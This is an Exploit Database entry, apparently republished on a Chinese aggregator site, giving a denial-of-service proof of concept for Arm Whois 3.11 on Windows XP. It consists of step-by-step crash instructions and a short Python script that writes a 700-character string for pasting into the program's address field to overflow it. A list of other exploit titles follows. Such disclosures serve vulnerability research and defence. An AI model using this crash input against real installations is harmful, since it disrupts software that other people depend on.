Arm Whois 3.11 – Denial of Service (PoC)

Exploit Database
19 阅读

作者： Yair Rodríguez Aparicio

日期： 2018-11-01
类别：
- dos
平台：
- windows_x86
来源：https://www.exploit-db.com/exploits/45762/

# Exploit Title: Arm Whois 3.11 - Denial of Service (PoC)
# Date: 2018-10-31
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: http://www.armcode.com/
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows XP Profesional Español SP3 x86 

# Steps to Produce the Crash:
# 1.- Run python code : python whois.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open whois.exe
# 4.- Paste clipboard on "IP address or domain"
# 5.- click on "Retrieves IP-adress info"
# 6.- Crashed!

buffer = "\x41" * 700
f = open("text.txt", "w")
f.write(buffer)
f.close()

last Exploits
Arm Whois 3.11 – Denial of Service (PoC)的更多信息

OpenOffice 3.1 – ‘.slk’ Null Pointer Dereference Remote Denial of Service：
WinMerge 2.12.4 – Project File Handling Stack Overflow：
MediaMonkey 3.2.1.1297 – Denial of Service (PoC)：
Xion Audio Player 1.0.126 – ‘.m3u8’ Buffer Overflow：
Kodi Web Server 16.1 – Denial of Service：
Samsung Galaxy S6 – libQjpeg je_free Crash：
EasyCom For PHP 4.0.0 – Denial of Service：
WebKit – User-agent Shadow root Leak in WebCore::ReplacementFragment::ReplacementFragment：